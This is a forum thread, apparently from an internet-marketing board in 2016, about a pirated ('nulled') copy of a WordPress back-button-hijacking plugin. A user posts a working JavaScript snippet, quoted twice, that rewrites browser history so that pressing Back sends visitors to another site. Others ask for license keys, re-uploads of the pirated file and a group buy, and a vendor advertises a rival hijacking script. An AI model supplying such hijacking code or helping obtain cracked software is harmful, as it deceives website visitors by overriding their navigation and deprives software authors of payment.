I installed the plugin and activated it but it asks for a license. I see the following message when I go to set up the plugin options
BackMagic ist nicht aktiviert. Geben Sie bitte unten einen gültigen Lizenzschlüssel ein. Sollten Sie noch keinen Lizenzschlüssel besitzen können Sie diesen hier erwerben.
What license should we put there?
Use this simple js code instead..works well (change the url after location.replace)
Code:
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/stealingyourhistory");
history.pushState(null, document.title, location.pathname);
window.addEventListener("popstate", function() {
if(location.hash === "#!/stealingyourhistory") {
history.replaceState(null, document.title, location.pathname);
setTimeout(function(){
location.replace("http://www.google.com");
},0);
}
}, false);
}(window, location));
Thanks, but this is fine for few-page-websites,
else will have to do lot of replication of coding across the site.
However BackMagic allows for multiple links randomized.
It's a choice for everyone.
Easy Script, with learning curve.
Easy plugin, with install and done!
(01-21-2016 11:44 PM)x264 Wrote: [ -> ]Use this simple js code instead..works well (change the url after location.replace)
Code:
(function(window, location) {
history.replaceState(null, document.title, location.pathname+"#!/stealingyourhistory");
history.pushState(null, document.title, location.pathname);
window.addEventListener("popstate", function() {
if(location.hash === "#!/stealingyourhistory") {
history.replaceState(null, document.title, location.pathname);
setTimeout(function(){
location.replace("http://www.google.com");
},0);
}
}, false);
}(window, location));
@connexionz
I have the Version 3 - but not nulled.
Please do the job! PM me!
Thanks!
(01-21-2016 04:22 AM)connexionz Wrote: [ -> ]What new features do you see in 3.0 (worth spending) than in this one?
Well your choice, as it is your money! :)
PEACE!
(01-21-2016 03:35 AM)ziiiz Wrote: [ -> ]This is one of the most valuable Wp-Plugins. Let you control the browser back button ..
Version 3 would be a really great deal!!
I would also be prepared for a GB if anyone would initiate it.
License for 10 Domains= € 397,-
Wow this sucker is cool!
This is certainly GB worthy.
Hey , The file does not exist on server anymore. Can you please re-upload?
Also is this clean? I always feel nulled plugins etc can be malicious. But I assume the OP is a legit person here?
Can you share latest version? Like I said, the file has been removed! Thanks mate!
Another BackJacker clone...with less features. If anyone wants a premium back button hijacking WordPress script that can send users to different URLs depending on the page they are on, or are looking for a script that has an option for an Exit Pop that can trigger when people actually try and navigate away from your site and not just change to another page check out BackJacker. We offer 20% off to anyone on the forum if you request our coupon in the BSO thread.
We offer a free trial as well...check out our
BSO for more info.
Many mirrors in this thread mate!
Just check from Post#2 onwards.
(01-22-2016 08:44 AM)theredbaron17 Wrote: [ -> ]Hey , The file does not exist on server anymore. Can you please re-upload?
Also is this clean? I always feel nulled plugins etc can be malicious. But I assume the OP is a legit person here?
Can you share latest version? Like I said, the file has been removed! Thanks mate!